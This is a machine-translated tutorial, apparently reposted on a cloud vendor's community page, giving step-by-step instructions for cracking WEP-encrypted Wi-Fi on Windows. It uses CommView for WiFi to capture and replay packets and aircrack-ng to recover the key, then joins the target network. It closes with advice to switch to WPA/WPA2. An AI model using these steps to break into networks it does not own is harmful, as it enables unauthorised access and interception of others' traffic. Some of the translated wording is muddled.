Step by step teach you how to crack Wi-Fi wireless WEP network keys

Source: Internet
Author: User

I believe that readers who know about wireless networks know that security is an inherent weakness of wireless networks. It is precisely because of its transmission through air that signals are prone to leakage problems, compared with wired networks, signal monitoring becomes very simple. Some users use WEP encryption to protect network communication data packets to avoid being deciphered by listeners. However, WEP encryption is no longer required in today's era of rapid development of security technology, there are also many methods to implement wireless WEP intrusion on the Internet. Today, I will introduce a more streamlined method, so that we can implement wireless WEP network intrusion within five minutes and easily restore the WEP encryption key to the plaintext.

1. Features of wireless WEP intrusion in five minutes:

As we all know, the user needs to receive a sufficient number of WEP verification packets through listening and other methods, and then restore the plaintext information of the WEP encryption key using brute force cracking methods by analyzing the software. This method is also required to implement wireless WEP intrusion in five minutes. However, the difference is that traditional WEP encryption and cracking methods require attackers to use professional intrusion CDs such as bt3 and bt4, you can use a wireless scan and crack CD to start a GUI for a Linux operating system, and then use a built-in cracking tool to scan and restore keys. On the one hand, the operation is limited, you cannot flexibly select applications on the GUI interface. On the other hand, you need to download several GB of Cracked CD images and burn them to a CD for startup. The most critical point is that such cracking does not support resumable cracking. That is to say, if the power is turned off or the cracking is stopped halfway, the previous work will be abandoned.

The five-minute wireless WEP intrusion method introduced by the author effectively addresses the shortcomings of the traditional method above. First, we do not need to download a large data disk, secondly, all the work is completed directly in the Windows system, with all graphical interfaces. In addition, we can divide the work into two stages: data collection and data cracking, which greatly improves the cracking Efficiency, implements the resumable upload function. Through the methods described in this article, we can collect the WEP verification data packets within a short period of time, and then perform the brute force cracking and restoration of WEP. In general, cracking WEP-encrypted wireless network speed is even more.

2. Change the wireless NIC Driver for data monitoring:

The same as for wireless WEP encryption, we first need to update our wireless NIC Driver, because by default, wireless NICs can communicate wirelessly, however, it is not competent for listening. The procedure is as follows.

Step 1: The notebook I use is IBM t400. By default, his wireless network adapter is the atheros ar5006 series. We need to change it to a suitable monitoring category. First, find the wireless network adapter under the network adapter in my computer task manager, right-click it and select "Update driver ". (1)


Step 2: In the hardware Installation Wizard, select "Install from list or specified location (advanced)" and click "Next" to continue. (2)


Step 3: select the driver. Use the file in the "driver" directory in the attachment to install the driver. Click "Browse" to find the corresponding NIC Driver, click "Next. (3)



Step 4: the system automatically scans the specified directory and updates the NIC Driver through the driver file. (4)


Step 5: After the update is completed, our wireless network adapter will be changed to commview atheros ar5006x wireless network adapter. Click "finish" to complete. (5)


Step 6: query the NIC again and you will see that the name has been successfully updated to commview atheros ar5006x wireless network adapter. (6)

So far, we have completed the update of the driver, and now the wireless network card of our notebook has the function of listening to wireless communication data packets. Now we can monitor wireless data packets through professional monitoring software.

3. Install commview for WiFi and collect related wireless communication data packets:

To smoothly monitor wireless communication data packets, in addition to using a specially cracked optical disc bt3 or bt4, we can use software in a Windows system, this is also one of the main tools introduced in this article to quickly crack WEP encryption. He is the famous commview for WiFi.

Commview for WiFi small files

Software Version: 6.1 build 607

Software size: 9881kb

Software type: shared version

Software language: English version

Applicable platforms: Windows 9x/ME/NT/2000/XP/2003



Step 1: Download commview for WiFi 6.1 build 607 from the Internet. It is worth noting that you must select for WiFi. Otherwise, you will not be able to smoothly monitor wireless communication data packets. Download the package, decompress the package, and run the main Installer. Click Next until the installation is complete. (7)


Step 2: Start the commview for WiFi software, click the "Arrow" (start monitoring) on the main interface, and then open the scan interface, next, click the start scanning button on the right to scan the wireless network in the current environment. The scan starts from Channel 1 to channel 13, therefore, the scanned wireless network SSID, device category, and other information are directly displayed on the gossip scan interface. Click the corresponding name to see the specific information, including signal strength, device MAC address, IP address and other information. (8)



In actual use, not every channel has many wireless networks, so we can directly set a specific scan channel under the options tab, such as scanning only channels 3, 6, and 7. This will increase the scanning speed to the maximum extent. After completing the settings, click OK. (9)


Step 3: In fact, I still have a good way to determine which scan channel has the most wireless network, that is, through a dedicated fast wireless scanning tool, I use wirelessmon Professional Edition, with this tool, we can know in a few seconds which wireless networks exist in the current environment, including those that do not enable SSID broadcast, at the same time, they know the signal frequency band they are using, so as to determine which band has the most wireless network, and then return to the community scan of commview for WiFi for corresponding settings. (10)


Step 4: Generally, data monitoring for wireless networks should not monitor multiple different wireless networks at the same time. Otherwise, there will be more wireless communication packets, which is not easy to filter, on the other hand, it also greatly reduces the final cracking speed. Therefore, we can add the MAC address of the wireless network device to be monitored through the rules tag in commview for WiFi to the filter information, at the same time, it specifies whether the monitoring traffic direction is outbound, inbound, or all communication. We generally recommend that you use the both communication in all directions. After adding the MAC address, select enable MAC address rules. Then, data is monitored and recorded only for the wireless network enabled for the Mac device. (11)


Step 5: After filtering information is set, click capture on the scacnner scan page to capture the information. Then, we will see all the wireless data packets scanned by commview for WiFi, including the frequency band and the corresponding wireless network SSID information. (12)


Step 6: after a period of proper monitoring, we click the packets packet label. Here we will see all the monitored wireless communication packets. In this case, we click the rightmost button in the row below to better view and filter data information, that is, the button corresponding to the header of the 18742 data packet is shown in the figure. (13)


Step 7: After opening the Log Viewer interface, we can arrange the data packets according to the protocol. Here we find the marked blue and the protocol name is encr. data is the data packet we want to analyze. Only such data packets can be used to successfully crack and restore the WEP encryption key. (14)


Step 8: Right-click the data packet and select send packet (S)-> selected to copy and send the data packet. (15)


Step 9: The send data packet window will be automatically opened. Here, we only need to modify the number of times. Generally, we need to collect hundreds of thousands of data packets for easy cracking, I usually select 0.8 million data packets before cracking. Click "send" and start sending the copied data packets in sequence. The number of sent data packets is also displayed below. (16)


Step 10: collect enough data packets and then return to the logging log tag on the commview for WiFi main interface, click the Save As button to save the file with the name NCF on the local hard disk. (17)


Step 2: double-click the saved NCF file and the file will be automatically opened using the Log Viewer log browsing tool. here we can see all the captured data packets, click Export logs-> tcpdump format in file to convert it to the tcpdump format. Only this format can be supported by the tools mentioned in the following brute-force cracking. (18)

After a new tcpdump file is generated, we can capture and monitor the data packets. Next, we can use brute-force cracking to restore the WEP Key.

4. Use aircrack to crack the WEP key:

We use the aircrack software to crack the  and restore the WEP key. The author uses the aircrack-ng GUI software. The related software is provided in the attachment. Interested readers can download it by themselves.

Step 1: Start the aircrack-ng GUI main program and select the first tab on the left.

Step 2: Click the choose button to select the previously saved tcpdump file with the suffix cap. (19)

Step 3: Click the launch button in the lower-right corner to analyze the monitored data packets. The software will list all the related wireless network parameters based on the monitored data information. here we need to select the one with the highest IVS value, this is the wireless network we want to crack. In this example, WEP (38119ivs ). (20)


Step 4: enter a sufficient number of network IDS corresponding to IVS and then automatically enter the brute-force cracking stage. Then, we need to wait patiently. If the number of IVs is not enough, a failed prompt will appear, which means we need to increase the number of monitored packets. (21)


Step 5: if the number of cracking attempts is met, the key found prompt will appear after a while, so that we can successfully crack the WEP encryption key used by the target wireless network, this achieves the goal of wireless WEP intrusion. (22)


Step 6: we can connect to the target wireless network smoothly through the scanned SSID information and WEP Key.

V. Summary:

This document describes how to use a boot disc in a Windows environment to directly crack and restore the WEP encryption key of the wireless network. This method has two main features, the whole process of the first attack is completed directly in a Windows environment. We can monitor data packets while surfing the Internet and no longer need to burn the boot disc; the second attack is completed through the  packets. Therefore, we can separate the attack and collection tasks to make the attack operations more flexible and complete the cracking work in batches; third, compared with the WEP verification content in the traditional passive monitoring wireless communication data packet, This method takes the initiative to obtain feedback information by copying the WEP verification data packet and repeatedly sending false data packets, therefore, a sufficient number of WEP verification packets are collected in the shortest time, which greatly improves the cracking speed. For ordinary users, WEP encryption is no longer secure. Only other encryption methods such as WPA and wpa2 can ensure the privacy of wireless network communication, therefore, we hope that wireless network users will pay enough attention to this article to reduce the number of wireless network applications encrypted by WEP. After all, for intruders, WEP encryption is just a half-open door.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.